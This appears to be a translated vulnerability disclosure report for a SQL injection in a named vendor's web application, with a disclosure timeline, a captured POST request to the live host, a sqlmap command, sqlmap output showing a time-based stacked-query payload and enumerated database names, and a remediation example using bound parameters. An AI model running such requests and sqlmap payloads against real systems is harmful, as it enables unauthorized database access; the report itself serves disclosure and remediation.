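2015-11-21: Details reported to the vendor; awaiting vendor handling
2015-11-23: Vendor confirmed; details disclosed to the vendor only
2015-12-03: Details disclosed to core white hats and experts in related fields
2015-12-13: Details disclosed to regular white hats
2015-12-23: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public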
POST /updatelogininfo.asp HTTP/1.1
Content-Length: 50
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://oms.znv.com:80/
Cookie: ASPSESSIONIDCQCRCSBQ=PMOBFEKCEAEODFHHJIGBDLFA; Hm_lvt_afcdbf2a49aeab4c86820ee180f2b8c4=1447921584; Hm_lpvt_afcdbf2a49aeab4c86820ee180f2b8c4=1447921584; defaultimg=1
Host: oms.znv.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

sid=*
sqlmap.py -r 1.txt --dbs --time-sec=10
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: sid=';WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[16:41:07] [INFO] fetching database names
[16:41:07] [INFO] fetching number of databases
[16:41:07] [INFO] resumed: 17
[16:41:07] [INFO] resumed: bbs_cfg
[16:41:07] [INFO] resuming partial value: boa
[16:41:07] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[16:41:21] [INFO] heuristics detected web page charset 'ISO-8859-2'
[16:41:21] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
rdMgr_
Parameter filtering
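The remediation above, shown as an added example (not code from the report or from the vendor): the sid value is checked against an allowlist and then passed as a bound parameter, next to the concatenated form that the payload in the sqlmap output relies on. The table, the sid format and the function names are assumptions, and sqlite3 stands in for the SQL Server back end.

```python
import re
import sqlite3

# Payload exactly as it appears in the sqlmap output above.
PAGE_PAYLOAD = "';WAITFOR DELAY '0:0:5'--"

# Assumption: sid is a short alphanumeric token; the real format is not on the page.
SID_RE = re.compile(r"[A-Za-z0-9]{1,64}")


def make_db():
    """Constructed stand-in table; the application's real schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login_info (sid TEXT PRIMARY KEY, hits INTEGER)")
    db.execute("INSERT INTO login_info VALUES ('abc123', 0)")
    return db


def build_unsafe_sql(sid):
    """'Before' form: the value becomes part of the statement text."""
    return "UPDATE login_info SET hits = hits + 1 WHERE sid = '" + sid + "'"


def update_bound(db, sid):
    """Bound parameter: sid is sent as data and never parsed as SQL."""
    cur = db.execute("UPDATE login_info SET hits = hits + 1 WHERE sid = ?", (sid,))
    return cur.rowcount


def update_login_info(db, sid):
    """Hardened handler: allowlist check first, then the bound query."""
    if not isinstance(sid, str) or not SID_RE.fullmatch(sid):
        return "rejected"
    return "updated" if update_bound(db, sid) == 1 else "unknown sid"


if __name__ == "__main__":
    db = make_db()
    print(build_unsafe_sql(PAGE_PAYLOAD))       # quote closes early, a second statement follows
    print(update_bound(db, PAGE_PAYLOAD))       # payload is compared as a literal string
    print(update_login_info(db, PAGE_PAYLOAD))  # refused before reaching the database
    print(update_login_info(db, "abc123"))      # a well-formed sid is processed
```

In classic ASP the bound-parameter step is an ADODB.Command with appended Parameters in place of a concatenated SQL string.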
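Severity: Low
Vulnerability Rank: 5
Confirmation time: 2015-11-23 09:20
力维 (ZNV) no longer belongs to ZTE, but thank you for the submission all the same.
None yet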